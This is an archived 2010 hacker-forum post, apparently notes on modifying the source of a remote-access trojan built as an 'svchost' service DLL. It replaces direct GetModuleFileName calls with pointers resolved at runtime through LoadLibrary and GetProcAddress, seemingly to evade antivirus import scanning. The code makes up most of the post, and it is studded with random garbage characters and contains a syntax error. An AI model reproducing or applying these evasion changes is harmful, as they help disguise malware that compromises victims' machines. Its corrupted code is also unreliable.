【3.A.S.T】网络安全爱好者's Archiver

黑客学习

ice_xke 发表于 2010-10-19 12:30

全局动态调用

全局动态调用笔记(_5aa(ze N0Y*},iB
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.hEb-A)bJ Q+R
----------------------------------------
S)s~l8v DTDY.h:
_?@7r0x0s"z i 'LNit(KS L7Q-\
#if _MSC_VER>1000[ B ZW]6w4Re
#pragma once
T/N8?0D:Ip7Z.P #endif //_MSC_VER>1000
;a!A:{1fE[N$K #include<windows.h>G)}j(b7i6I@

,F]Z*z SecD typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
~n%TxI5~(Xng class DTDY
l j&k"p#y|%B ? {:MdK[f Y
public:
,|5S3s;E |&d DTDY();
C!c-Hng!NFn\J virtual ~DTDY();
zX!HlN%hO | D public:
$y4^o]%?6Z#Wj8OJ? W g static pGetModuleFileNameA MyGetModuleFileName;
Z(HY7RA.B(Ho static BOOL FunInitiallization();/c)KJ WyY
};
+Dk9E&zK%fL #endif~Z+[s jV(C
----------------------------------------
5MZ Z7chk #eTU:U(I.~
DTDY.cpp:
c f/[&Tn \n"uH
0kRZ0B\l #include "DTDY.h"
m1N)r^$Z9~ ~P pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
1e ^_7]"Rr DTDY:TDY()
}gS{N&mrd {0G9O%jAM`
}]+wE7S H,h7E _1T
DTDY::~DTDY()
1w+H\1\W;~ybY] {
Wn%^T9G+P }#H X N#oQ8xq.@
BOOL DTDY::FunInitiallization()
8o9DW]UX%} {
&dN]7Dz HMODULE hModule=LoadLibrary("kernel32.dll");
B2EC%~ K;r*iO MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");5N!{A3g1S:G2x A0Yt
if(!MyGetModuleFileName=) return FALSE;q}8d7F6u)B"jC

Z}'oo-h@k return TRUE;
,e6KO2qx }$EJCOj3A
----------------------------------------
|X^ X;D:~ svchost.cpp:
?m8o!h{V `U
5UFe VNGQ #include "DTDY.h" W^5k x;R?~o

bX-U:q H1w*f BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
Fp0I,@,UG nq {I+Jt J*LnE-Et
switch(ul_reason_for_call)v9@do'B4Z \4tgye
{9i/{}8q'Hvf:ZG
case DLL_PROCESS_ATTACH:
+I!HQ$c Z if(!DTDY::FunInitiallization()) return FALSE;
H3E6V/D!w+SXg&Fv
Z|/\OP:`!_;IQ%} break;
9ZjQ rAX2I7f }y&M C&bQC%^
}mv5fj3Xv

9n0X#c6~ q KGh8z
YM2xq5@8c[)p[ GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto defscmToI
改写为*[(f(Q:ucA5@
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
.JMb)n5MP6D'X(Y ----------------------------------------
)ns g,i/w%~ KernelManager.cpp: E!bBKTQ9w

h*[[aUE #include "../DTDY.h"
}/YxIZC y] GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));7I L0kQfL z
改写为)e?LM;V*EMp
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));!s*lxsOY%Lu
----------------------------------------

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.